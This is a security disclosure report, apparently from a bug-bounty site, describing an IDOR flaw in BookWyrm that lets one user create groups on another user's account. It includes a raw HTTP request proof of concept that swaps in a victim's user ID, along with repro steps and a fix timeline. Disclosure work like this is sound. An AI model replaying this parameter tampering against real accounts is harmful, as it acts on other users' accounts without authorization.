Idor when creating group in bookwyrm-social/bookwyrm

Valid

Reported on

Aug 2nd 2022


Description

Insecure direct object references when creating a list allows one user to create a new list on behalf of another.

Proof of Concept

POST /user/alizo@bookwyrm.social/groups HTTP/2
Host: bookwyrm.social
Cookie: csrftoken=; django_language=None; sessionid=
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bookwyrm.social/user/alizo/groups
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: https://bookwyrm.social
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

csrfmiddlewaretoken=token&user=victim'suserid&name=idor&description=idor&privacy=public

Steps to repro:-

1.Login with user1 account then go to Profile page.

2.Go to the groups tab then create a new group.

3.Intercept the request, in the body content, change the value of user from user1_id to user2_id then forward the request.

4.You will see that a new group is create in user2 account instead of user1 account.

Impact

This vulnerability is capable of allows a user to create a group on other users' accounts, affecting the logic of the application.

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 2 months ago
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back 2 months ago
Mouse Reeve validated this vulnerability 2 months ago
Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on e5611c 2 months ago
The fix bounty has been dropped
to join this conversation